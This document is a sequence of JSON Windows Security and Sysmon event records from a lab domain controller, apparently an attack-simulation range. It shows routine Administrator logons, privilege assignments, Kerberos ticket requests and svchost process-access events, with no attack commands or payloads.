{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220503,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C583\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6c583","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220504,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C583\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6c583","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220505,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220506,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220507,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220508,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C7C4\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{EB91402E-9BD5-4DA7-291F-50A2B141A228}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6c7c4","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{EB91402E-9BD5-4DA7-291F-50A2B141A228}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220509,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6C7C4\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6c7c4","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4568,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4569,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4570,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
